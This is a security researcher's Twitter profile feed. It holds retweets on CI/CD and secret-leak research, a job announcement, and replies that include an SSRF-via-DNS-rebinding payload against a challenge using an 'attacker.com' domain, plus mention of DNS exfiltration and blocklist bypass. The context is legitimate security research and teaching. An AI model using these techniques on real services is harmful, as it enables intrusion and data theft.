Karim Rahal
@KarimPwnz
Followers: 3K | Following: 4K | Statuses: 388
RT @Doyensec: Check out @maxenceschmitt's presentation at @owasp's Global AppSec in Lisbon to learn how Client-Side Path Traversal can be le…
RT @Doyensec: We're excited to announce @KarimPwnz is the latest addition to the #Doyensec team! Welcome aboard!
👋 I'm graduating (Spring 2024), and I am looking for a security role in the US. My interests include web app security, CI/CD security, and open-source security. Email - karim@karimrahal.com LinkedIn - Any RT for reach would be appreciated ❤️
RT @TupleType: How a worm 🪱 can be used to compromise @github repositories at scale through the Actions dependency tree🌲? The blog details…
RT @clintgibler: 🔐 How Secrets Leak in CI/CD Pipelines This post describes a number of subtle ways secrets can leak in CI 😅 Second-order…
@adnanthekhan Thank you so much for the kind tweet <3 Gato looks super cool and useful; I didn't know about it. Let me know if you end up adding any of the techniques. That would be awesome!
RT @alngpwn: Read my writeup and exploit for a Use-After-Free Vulnerability in Artifex MuJS (CVE-2022-44789): Hop…
@Sonar_Research Yes, it's an SSRF through DNS rebinding. Exploit: /avatar/.attacker.com You point unstable-avatar-service.tld.attacker[.]com to which switches between 127.0.0.1 (private IP) and 93.184.216.34 (public IP). Then, you race condition to bypass line 14.
The "Example Usage" above allowed me to find GitHub Actions vulnerable to command injection. The scripts can also complement the workflow suggested by @snyff:
Do you want to find new vulnerabilities? 1. Look at the patch for a recent CVE (for example: CVE-2021-43350) 2. Write a @semgrep rule for them (tune your rule using the CVE you picked) 3. Scan a lot of code repositories with this rule. 4. Manually confirm the matches.
RT @rub003: Instead of relying on third parties and giving your findings/data away to them, why not use a custom DNS logger. For example dn…
@akita_zen @rub003 Fair lol. The tool is mostly meant for bypassing blocklists or exfiltrating data through DNS. But the added privacy is also useful, you know!
@codingo_ @infosec_au @Bugcrowd Given that triagers have to deal with a significant number of invalid/spam reports, what steps is @Bugcrowd taking to minimize burnout amongst triagers?